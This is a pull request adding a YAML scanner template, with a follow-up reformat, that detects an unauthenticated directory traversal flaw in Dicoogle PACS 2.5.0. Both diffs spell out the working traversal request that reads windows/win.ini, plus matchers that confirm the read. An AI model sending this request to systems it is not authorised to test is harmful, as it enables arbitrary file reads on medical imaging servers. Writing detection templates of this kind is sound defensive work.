### PR TITLE
Create dicoogle-pacs-lfi.yaml

### DIFF
--- a/dicoogle-pacs-lfi.yaml
+++ b/dicoogle-pacs-lfi.yaml
@@ -1,0 +1,24 @@
+id: dicoogle-pacs-lfi
+
+info:
+  name: Dicoogle PACS 2.5.0 - Directory Traversal
+  author: 0x_akoko
+  severity: high
+  description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
+  reference: https://cxsecurity.com/issue/WLB-2018070131
+  tags: windows,lfi,dicoogle
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+        part: body

--- a/vulnerabilities/other/dicoogle-pacs-lfi.yaml
+++ b/vulnerabilities/other/dicoogle-pacs-lfi.yaml
@@ -5,7 +5,9 @@ info:
   author: 0x_akoko
   severity: high
   description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
-  reference: https://cxsecurity.com/issue/WLB-2018070131
+  reference:
+    - https://cxsecurity.com/issue/WLB-2018070131
+    - http://www.dicoogle.com/home
   tags: windows,lfi,dicoogle
 
 requests:
@@ -13,12 +15,11 @@ requests:
     path:
       - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
 
-    stop-at-first-match: true
     matchers:
       - type: word
+        part: body
         words:
           - "bit app support"
           - "fonts"
           - "extensions"
         condition: and
-        part: body


### PR DESCRIPTION
### Template / PR Information

### Admin credentials aren't required ( Unauth )

Dicoogle PACS 2.5.0 - Directory Traversal
Date: 2018-05-25
Software Link: http://www.dicoogle.com/home
Version: Dicoogle PACS 2.5.0-20171229_1522
Category: webapps
Reference: https://cxsecurity.com/issue/WLB-2018070131

### Template Validation

I've validated this template locally?
- YES
